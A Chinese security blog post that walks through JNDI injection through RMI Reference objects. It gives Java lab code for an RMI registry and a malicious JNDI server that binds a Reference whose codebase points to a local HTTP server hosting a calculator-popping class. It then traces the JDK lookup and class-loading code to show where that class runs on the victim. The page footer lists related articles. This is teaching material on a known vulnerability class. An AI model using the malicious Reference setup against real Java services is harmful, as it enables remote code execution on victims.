JNDI注入-RMI和Reference

于 2024-07-28 01:15:02 发布
阅读量502 收藏 6
点赞数 3
分类专栏: JNDI注入 文章标签: JNDI Java反序列化
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45436292/article/details/140744186
版权

参考博客:

JNDI注入与动态类加载

JNDI

Java命名和接口目录为用Java编程语言编写的应用程序提供命名和目录功能。

可以通过一种通用方式访问各种服务,类似通过名字查找对象的功能,和RMI有点类似。

原生JNDI支持RMI,LDAP,COS,DNS.

JNDI+RMI

JNDI结合RMI使用

RMIServer.java

package org.example;

import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry;

public class RMIServer {
    public static void main(String[] args) throws Exception {
        RemoteObjImpl remoteObj = new RemoteObjImpl();
        Registry registry = LocateRegistry.createRegistry(1099);
        registry.bind("remoteObj",remoteObj);
    }
}

JNDIRMIServer.java

public class JNDIRMIServer {
    public static void main(String[] args) throws Exception {
        InitialContext initialContext = new InitialContext();
        initialContext.rebind("rmi://localhost:1099/remoteObj", new RemoteObjImpl());
    }
}

JNDIRMIClient.java

public class JNDIRMIClient {
    public static void main(String[] args) throws Exception {
        InitialContext initialContext = new InitialContext();
        IRemoteObj remoteObj = (IRemoteObj) initialContext.lookup("rmi://localhost:1099/remoteObj");
        remoteObj.sayHello("hello");
    }
}

自己可以运行下试试,不运行JNDIRMIServer.java的话,JNDI客户端一样可以获取到remoteObj服务端。

JNDI Reference(传统JNDI注入)

JNDIRMIServer.java

把引用Reference绑在RMI服务上

Test.class是弹计算器的,放在本地目录。python开启个http服务。

public class JNDIRMIServer {
    public static void main(String[] args) throws Exception {
        InitialContext initialContext = new InitialContext();

        //Reference
        Reference refObj = new Reference("Test", "Test", "http://localhost:4444/");
        initialContext.rebind("rmi://localhost:1099/remoteObj", refObj);

    }
}

攻击场景:我们可以控制恶意服务端绑定一个恶意Reference,让受害端lookup这个reference就能实现攻击。

下面跟进一下JNDIRMIClient中IRemoteObj remoteObj = (IRemoteObj) initialContext.lookup("rmi://localhost:1099/remoteObj");lookup方法的逻辑。

lookup最终调用到registry.lookup("remoteObj");

但是注意一下lookup函数返回的是一个ReferenceWrapper_Stub,而我们绑定时绑定的是Reference。

image-20240727174142434

再看下绑定时的逻辑

最终调用到registry.rebind();方法,注意到有个encodeObject处理。

image-20240727175743713

关于ReferenceWrapper_Stub,这个Stub得生成我debug了一下是在var1 = NamingManager.getStateToBind(var1, var2, this, this.environment); 里面生成的Stub。因为是结合的RMI,所以客户端是通过Stub和注册中心交流的(我是这么理解的)

private Remote encodeObject(Object var1, Name var2) throws NamingException, RemoteException {
    var1 = NamingManager.getStateToBind(var1, var2, this, this.environment);  
    if (var1 instanceof Remote) {
        return (Remote)var1;
    } else if (var1 instanceof Reference) {     //如果是Reference类型,则把它封装在ReferenceWrapper里面。
        return new ReferenceWrapper((Reference)var1);
    } else if (var1 instanceof Referenceable) {
        return new ReferenceWrapper(((Referenceable)var1).getReference());
    } else {
        throw new IllegalArgumentException("RegistryContext: object to bind must be Remote, Reference, or Referenceable");
    }
}

在继续看客户端lookup()

拿到ReferenceWrapper,进行decodeObject

在getObjectInstance方法时还没有进行初始化(执行调用计算器方法),而在NamingManager.getObjectInstance方法就跳出RegistryContext这个类了。所以说最终实现类加载的地方并不是在RMI里面

//RegistryContext
private Object decodeObject(Remote var1, Name var2) throws NamingException {
    try {
        Object var3 = var1 instanceof RemoteReference ? ((RemoteReference)var1).getReference() : var1;  //表达式为真,执行getReference拿到Reference
        return NamingManager.getObjectInstance(var3, var2, this, this.environment); //注意这个getObjectInstance方法
    } catch (NamingException var5) {
        throw var5;
    } catch (RemoteException var6) {
        throw (NamingException)wrapRemoteException(var6).fillInStackTrace();
    } catch (Exception var7) {
        NamingException var4 = new NamingException();
        var4.setRootCause(var7);
        throw var4;
    }
}

跟进NamingManager.getObjectInstance,需要关注的是factory = getObjectFactoryFromReference(ref, f);

//NamingManager.getObjectInstance
if (ref != null) {
    String f = ref.getFactoryClassName();
    if (f != null) {
        // if reference identifies a factory, use exclusively

        factory = getObjectFactoryFromReference(ref, f);    //从引用中获取工厂factory
        if (factory != null) {
            return factory.getObjectInstance(ref, name, nameCtx,
                                             environment);
        }
        // No factory found, so return original refInfo.
        // Will reach this point if factory class is not in
        // class path and reference does not contain a URL for it
        return refInfo;

    } else {
        // if reference has no factory, check for addresses
        // containing URLs

        answer = processURLAddrs(ref, name, nameCtx, environment);
        if (answer != null) {
            return answer;
        }
    }
}

跟进getObjectFactoryFromReference

static ObjectFactory getObjectFactoryFromReference(
    Reference ref, String factoryName)
    throws IllegalAccessException,
    InstantiationException,
    MalformedURLException {
    Class<?> clas = null;

    // Try to use current class loader
    try {
         clas = helper.loadClass(factoryName);    //尝试helper.loadClass加载类
    } catch (ClassNotFoundException e) {
        // ignore and continue
        // e.printStackTrace();
    }
    // All other exceptions are passed up.

    // Not in class path; try to use codebase
    String codebase;
    if (clas == null &&
            (codebase = ref.getFactoryClassLocation()) != null) {
        try {
            clas = helper.loadClass(factoryName, codebase);  //通过codeBase加载类
        } catch (ClassNotFoundException e) {
        }
    }

    return (clas != null) ? (ObjectFactory) clas.newInstance() : null;
}

跟进第一个clas = helper.loadClass(factoryName);

可以发现类加载用的是AppClassLoader,是在客户端本地进行类的寻找的,肯定是找不到返回null的。

image-20240727185208783

之后程序执行到第二个clas = helper.loadClass(factoryName, codebase);

这里涉及到了一个codeBase,也就是我们输入的http://localhost:4444/,实际上是一种URL。

之前RMI的使用中,客户端和服务端同时定义了相同的远程接口,那么如果客户端没有那个服务接口怎么办?codeBase就是为了解决这个问题的,客户端可以通过codeBase从URL里面加载类,这样一来客户端不需要定义远程接口了。

接下来看一下使用codeBase的类的加载

可以看到类加载器变为URLClassLoader,之前在双亲委派模型中也讲过URLClassLoader加载任意类。

image-20240727190534065

之后执行URLClassLoader.loadClass,调用Class<?> cls = Class.forName(className, true, cl);,第二个参数设置为true,也就是会在加载类时初始化我们的恶意类。我的恶意类执行计算器代码写在了静态代码块里,所以在loadClass初始化恶意类时,就打开了计算器。

image-20240727200940840

可以看到URLClassLoader查找类的路径,就是我们输入的codeBase

image-20240727201423198

如果弹计算器代码写在了构造函数里面,就在执行return (clas != null) ? (ObjectFactory) clas.newInstance() : null;实例化Test类时,弹计算器。

总结攻击面

  1. 之前观察到initialContext.lookup()方法时,最终会调用到registry.lookup()。bind和rebind也是一样的。所以远程RMI有的攻击点,这里也是有的
  2. 就是本节讲的Reference的攻击点。
    了构造函数里面,就在执行return (clas != null) ? (ObjectFactory) clas.newInstance() : null;实例化Test类时,弹计算器。
y06_z
关注
专栏目录
Java代码审计】JNDI注入
大河之犬的博客
03-07 2251
JNDI (Java Naming and Directory Interface )是 Java 提供的 Java 命名和目录接口。通过调用 JNDI 的 API 可以定位资源和其他程序对象。JNDIJava EE 的重要部分,JNDI 可访问的现有的目录及服务有:JDBC、LDAP、RMI、DNS、NIS、CORBA为了在命名服务或目录服务中绑定 Java 对象,可以使用 Java 序列化来传输对象,但有时候不太合适,比如 Java 对象较大的情况。
JNDI学习
小孩No乖的专栏
05-11 143
首先,我来介绍一下JNDI服务中的Reference对象。   一般来说,我们可以把一个对象注册到JNDI服务中,通过调用InitialContext的bind和rebind方法即可。这个被注册的对象,我们称之为“被引用对象”,它是驻扎在内存中的运行时对象。JNDI服务的功能不是仅限于此,它还可以注册各种资源,例如网络打印机。这类资源可不是内存中可以找到的运行时对象,所以它们不能直接注册到JNDI...
RMI ReferenceWrapper_Stub With Hostname
测试
12-22 1466
概要去年我salt大哥带我搞一个存在FastJson漏洞站的时候, 在ECS上启动rmi后,使用Reference 加载远程codebase代码库的方法, 但是一直没能成功执行命令。最后才了解到需要修改掉/etc/hostname文件为公网ip地址才能够正常利用, 在修改掉/etc/hostname为公网ip后,成功弹回来了shell。 失败原因当时使用的启动rmi服务的java代码。RMISer...
JNDI设计内幕
qiqijava的专栏
11-29 898
1 将接口分为Context 和 DirContext     JNDI有两个核心接口Context和DirContext,Context中包含了基本的名字操作,而DirContext则将这些操作扩展到目录服务。将这些操作分为两个包一方面为了模块化,另一方面也可以使服务减少不必要的开销。名字是计算服务中的一个基本功能,使用基本的名字服务就可以获得文件系统、电子表格、日历服务等功能;DirConte
RMI(Remote Method Invocation)原理浅析
u012005912的专栏
04-26 236
现代的 网络和编程技术,让我们的资源共享从信息逐步迈向了硬件,你想到过吗?你可以把一个解密的任务放到远程的运行更快的,闲置的服务器上进行,最后把运算的结果返回来,你 所要做的就是提交任务。看到了吧,处理这些任务是远程的服务器。 JavaRMI的技术让这种实现变得非常的容易,本文就从基础性的东西讲解一下RMI的原理,有关安全和部署的问题,本文不加于讨论。 读过本文希望对你的学习有所帮助。 本...
一文搞清rmijndireference,ldap
superprintf的博客
01-15 974
本文在编写代码的角度并不是很严谨,但是从安全利用角度对于理解他们之间的关系很有帮助。 单纯的rmi获取类首先通过本地CLASSPATH,java.class.path等加载class,若无则通过codebase加载远程地址(http、ftp。。) 通过如下命令设置codebase地址 java -Djava.rmi.server.useCodebaseOnly=false - Djava.rmi.server.codebase=http://example.com/ RMIClient //RMIServe
JNDI注入(RMI攻击实现和LDAP攻击实现)
weixin_45682070的博客
12-12 9563
0x01 JNDI 概述 JNDIJava Naming and Directory Interface(JAVA命名和目录接口)的英文简写,它是为JAVA应用程序提供命名和目录访问服务的API(Application Programing Interface,应用程序编程接口) 简单一点理解就是:JNDI的做法,就是定义一个数据源,与系统外部的资源的引用 都可以通过JNDI定义和引用 JNDI可访问的现有的目录及服务有: DNS、XNam 、Novell目录服务、LDAP(Lightweight Dir
log4j2 JNDI注入漏洞问题复现
逗神的博客
12-13 4703
log4j2 JNDI注入漏洞问题复现
绕过高版本JDK限制的JNDI注入
weixin_45682070的博客
01-21 1754
前言 JNDI_RMI在JDK 6u132, JDK 7u122, JDK 8u113版本中,系统属性 com.sun.jndi.rmi.object.trustURLCodebase;com.sun.jndi.cosnaming.object.trustURLCodcbase 的默认值变为false,即默认不允许从远程的Codebase加载Reference工厂类。 JNDI_LDAP在Oracle JDK 6u211、7u201、8u191、11.0.1、之后 com.sun.jndi.ldap.obj
Java代码审计】JNDI+RMI绕过高版本JDK的限制
最新发布
大河之犬的博客
03-08 986
传入的 Reference为 ResourceRef 类,后面通过反射的方式实例化 Reference 所指向的任意 Bean Class,调用 setter 方法为所有的属性赋值,该 Bean Class 的类名、属性、属性值,全都来自于 Reference 对象。因此,实际上我们可以调用任意指定类的任意方法,并指定单个可控的参数。因此,我们实际上可以指定一个存在于目标 classpath 中的工厂类名称,交由这个工厂类去实例化实际的目标类(即引用所指向的类),从而间接实现一定的代码控制。
JavaRMI远程调用
01-20
Java远程方法调用,即Java RMIJava Remote Method Invocation)是Java编程语言里,一种用于实现远程过程调用的应用程序编程接口。它使客户机上运行的程序可以调用远程服务器上的对象。远程方法调用特性使Java编程人员能够在网络环境中分布操作。RMI全部的宗旨是尽可能简化远程接口对象的使用。   Java RMI极大地依赖于接口。在需要创建一个远程对象的时候,程序员通过传递一个接口来隐藏底层的实现细节。客户端得到的远程对象句柄正好与本地的根代码连接,由后者负责透过网络通信。这样一来,程序员只需关心如何通过自己的接口句柄发送消息。   服务端新建接口:
JNDI基础
ml
08-14 918
Java Naming and Directory Interface Java命名和目录接口
应用安全系列之十四:JNDI引用注入
jimmyleeee的专栏
03-09 959
本系列文章主旨在于介绍一些漏洞类型产生的基本原理,探索最基础的解决问题的措施,不排除有些语言或者系统提供的安全的API可以更好地更直接地解决问题,也不排除可以严格地输入验证来解决。 如果有不妥之处,希望可以留言指出。谢谢! ...
Java安全(九) JNDI
WDWAGAAFGAGDADSA的博客
12-28 2532
JNDI基本知识及利用
java安全入门(四)——JNDI入门指北
weixin_45808483的博客
02-14 4518
前言 log4j2 宛如过年一般,趁此机会对没理清的 JNDI 协议仔细再捋一捋 log4j的payload很好记:${jndi:ldap/rmi://xxxxxx/exp} 那么,我们就需要研究一下是怎么来的。 首先来看rpc RPC RPC即 Remote Procedure Call(远程过程调用),==是一种技术思想而并非一种规范的协议==,是一种通过网络从远程计算机请求服务的过程。 常见 RPC 技术和框架有: 应用级的服务框架:阿里的 Dubbo/Dubbox、Google
JNDI注入 Reference + RMI 打开了rmi.object.trustURLCodebase还是失败
b1ackc4t的博客
03-11 966
前情提要 服务端(攻击者) package org.example.rmi; import com.sun.jndi.rmi.registry.ReferenceWrapper; import javax.naming.NamingException; import javax.naming.Reference; import java.rmi.AlreadyBoundException; import java.rmi.RemoteException; import java.rmi.registry
RMI原理浅析
CSDN文章已停止维护,后续文章会在 https://blog.hufeifei.cn 持续更新
12-23 1040
之前看过一个RMI的简单示例。这篇文章简单的分析一下RMI的原理。 RMI应用程序的体系结构 上一个例子中,我们编写了两个程序,一个服务端(Server)和一个客户端(Client)。 在Server内创建一个远程对象(CalcServiceImpl),并生成存根,注册到Registry中。 客户端请求远程对象,并调用对象的方法。 Transport Layer:RMI传输层...
5-java安全基础——RMIJNDI实现漏洞利用
网络安全
07-14 3649
JNDIJava Naming and Directory Interface,Java命名和目录接口)是一组在Java应用中访问命名和目录服务的接口,jndi可以实现给当前服务器的所有资源定义一个唯一的访问标识(例如数据库,网页,文件,连接池等等),方便开发者通过指定的标识来访问对象(目标资源文件,数据库等等)。 关于什么是标识符?可参考RMI注册表,例如在RMI中通过rmi://10.100.0.1:10086/userRmiServices来映射RMI注册表中的userRmiServices远
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值